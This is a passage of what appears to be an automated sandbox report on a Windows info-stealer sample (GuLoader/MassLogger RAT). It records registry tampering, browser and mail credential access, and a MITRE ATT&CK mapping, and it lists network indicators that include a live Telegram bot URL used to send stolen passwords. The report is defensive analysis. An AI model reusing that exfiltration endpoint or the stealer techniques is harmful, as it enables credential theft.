Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Queries volume information: C:\Users\user\Desktop\b5BQbAhwVD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004034A5

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Task Manager(disabletaskmgr)

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Registry value created: DisableTaskMgr 1

Jump to behavior

Disables CMD prompt

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Registry value created: DisableCMD 1

Jump to behavior

Disables the Windows task manager (taskmgr)

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: b5BQbAhwVD.exe PID: 6424, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: b5BQbAhwVD.exe PID: 6424, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: b5BQbAhwVD.exe PID: 6424, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: b5BQbAhwVD.exe PID: 6424, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: b5BQbAhwVD.exe PID: 6424, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	31 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
b5BQbAhwVD.exe	76%	Virustotal		Browse
b5BQbAhwVD.exe	61%	ReversingLabs	Win32.Trojan.GuLoader
b5BQbAhwVD.exe	100%	Avira	HEUR/AGEN.1337946

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://api.telegramLR	0%	Avira URL Cloud	safe
https://api.telegram.orgra	0%	Avira URL Cloud	safe
http://checkip.dyndn	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.186.142	true	false	high
drive.usercontent.google.com	172.217.18.97	true	false	high
reallyfreegeoip.org	104.21.80.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram.org	b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.000000003396B000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033957000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A2B000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/K	b5BQbAhwVD.exe, 00000003.00000002.3389482008.0000000036152000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382	b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	b5BQbAhwVD.exe, 00000003.00000003.2469426285.0000000003249000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegramLR	b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/	b5BQbAhwVD.exe, 00000003.00000003.2509453504.0000000003241000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2476161231.0000000003248000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3365100943.0000000003231000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2509525856.0000000003246000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033891000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	b5BQbAhwVD.exe	false		high
https://www.google.com	b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/-40f1-ac21-573d1d5ce43f	b5BQbAhwVD.exe, 00000003.00000002.3365100943.00000000031D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	b5BQbAhwVD.exe, 00000003.00000002.3365100943.00000000031D8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/3	b5BQbAhwVD.exe, 00000003.00000002.3389482008.0000000036152000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram	b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/g	b5BQbAhwVD.exe, 00000003.00000002.3365100943.00000000031D8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033891000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.orgra	b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndn	b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.189es	b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338C1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
142.250.186.142	drive.google.com	United States	15169	GOOGLEUS	false
172.217.18.97	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
158.101.44.242	unknown	United States	31898	ORACLE-BMC-31898US	false
104.21.80.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588212
Start date and time:	2025-01-10 22:41:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	b5BQbAhwVD.exe renamed because original name is a hash value
Original Sample Name:	d314fe716123c0fac98d48d7d4acd4fe887217c2a9ad0fc96850235785f7f79b.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/8@7/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 157 Number of non-executed functions: 109
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
16:43:35	API Interceptor	367348x Sleep call for process: b5BQbAhwVD.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	ppISxhDcpF.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	CvzLvta2bG.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	3WgNXsWvMO.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
api.telegram.org	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
checkip.dyndns.com	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
UTMEMUS	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
ORACLE-BMC-31898US	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	hZbkP3TJBJ.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	FILHKLtCw0.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
3b5074b1b5d032e5620f69f9f700ff0e	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	iRmpdWgpoF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	iRmpdWgpoF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	3pwbTZtiDu.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	87J30ulb4q.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	jG8N6WDJOx.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.186.142 172.217.18.97
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.186.142 172.217.18.97
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.186.142 172.217.18.97
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.186.142 172.217.18.97
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.186.142 172.217.18.97
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.186.142 172.217.18.97
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.186.142 172.217.18.97
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.186.142 172.217.18.97
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.186.142 172.217.18.97
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	142.250.186.142 172.217.18.97

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
